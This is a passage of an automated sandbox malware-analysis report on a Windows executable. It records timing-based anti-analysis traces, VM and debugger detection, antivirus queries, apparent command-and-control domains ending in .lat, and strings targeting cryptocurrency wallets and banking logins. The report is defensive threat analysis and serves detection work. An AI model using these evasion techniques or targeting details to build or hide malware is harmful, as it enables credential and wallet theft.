                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800079 second address: 4800150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69CE9FC64h 0x00000012 add si, A888h 0x00000017 jmp 00007FC69CE9FC5Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC69CE9FC68h 0x00000023 sub esi, 382B0AE8h 0x00000029 jmp 00007FC69CE9FC5Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 jmp 00007FC69CE9FC66h 0x00000036 push eax 0x00000037 jmp 00007FC69CE9FC5Bh 0x0000003c xchg eax, ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC69CE9FC5Bh 0x00000046 xor cx, 6F8Eh 0x0000004b jmp 00007FC69CE9FC69h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007FC69CE9FC60h 0x00000057 or al, 00000008h 0x0000005a jmp 00007FC69CE9FC5Bh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800150 second address: 4800156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800156 second address: 480015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800B0F second address: 4800B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800B15 second address: 4800B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800B19 second address: 4800B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800B80 second address: 4800B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800B86 second address: 4800BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 1636FD7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC69CB9B4B3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800BA8 second address: 4800BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 613B6156h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC69CE9FC5Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800BDB second address: 4800BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800C49 second address: 4800C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800C4F second address: 4800C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800C53 second address: 4800C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007FC69CE9FC66h 0x0000000f je 00007FC70F713968h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edi 0x00000019 pop eax 0x0000001a movsx edi, cx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800C82 second address: 4800C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800C88 second address: 4800CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp+08h], 00002000h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FC69CE9FC63h 0x0000001a pop ecx 0x0000001b push edi 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800CBC second address: 4800CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48109F9 second address: 4810A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC64h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A11 second address: 4810A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A21 second address: 4810A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A26 second address: 4810A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A2C second address: 4810A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A30 second address: 4810A41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A41 second address: 4810A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A45 second address: 4810A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810A4B second address: 4810AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69CE9FC5Dh 0x00000012 sub esi, 252D6DE6h 0x00000018 jmp 00007FC69CE9FC61h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007FC69CE9FC5Eh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC69CE9FC5Eh 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810AA5 second address: 4810B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC69CB9B4B7h 0x00000014 add si, F32Eh 0x00000019 jmp 00007FC69CB9B4B9h 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC69CB9B4B9h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810B12 second address: 4810B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007FC69CE9FC62h 0x00000012 je 00007FC70F70D4DCh 0x00000018 pushad 0x00000019 jmp 00007FC69CE9FC5Eh 0x0000001e mov edx, eax 0x00000020 popad 0x00000021 cmp dword ptr [770E459Ch], 05h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CE9FC66h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810B6A second address: 4810B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810B6E second address: 4810B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810B74 second address: 4810BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CB9B4B3h 0x00000009 adc ah, 0000000Eh 0x0000000c jmp 00007FC69CB9B4B9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 je 00007FC70F420D92h 0x0000001b jmp 00007FC69CB9B4AEh 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 movsx ebx, si 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810BCA second address: 4810BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810BDC second address: 4810BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810C3E second address: 4810C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810C4E second address: 4810C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810C66 second address: 4810C6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5B3099 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5B1744 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5DEB5C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5BBA4A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe TID: 6160 Thread sleep time: -270000s >= -30000s
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Last function: Thread delayed
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: Amcache.hve.5.dr Binary or memory string: VMware
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
                Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
                Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
                Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888743317.0000000000595000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
                Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk5<Jz
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696501413p
                Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888743317.0000000000595000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: NTICE
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: SICE
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: bashfulacid.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: tentabatte.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: curverpluch.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: talkynicer.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: shapestickyr.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: manyrestro.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: slipperyloo.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: wordyfindy.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: observerfry.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1889746631.00000000005D9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: N/Program Manager
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1470419728.0000000005218000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: zLP3oiwG1g.exe PID: 7300, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: zLP3oiwG1g.exe String found in binary or memory: :0,"p":"%appdata%\\Electrum\\wallets
                Source: zLP3oiwG1g.exe String found in binary or memory: Wallets/ElectronCash
                Source: zLP3oiwG1g.exe String found in binary or memory: window-state.json
                Source: zLP3oiwG1g.exe, 00000000.00000003.1418572620.000000000038C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
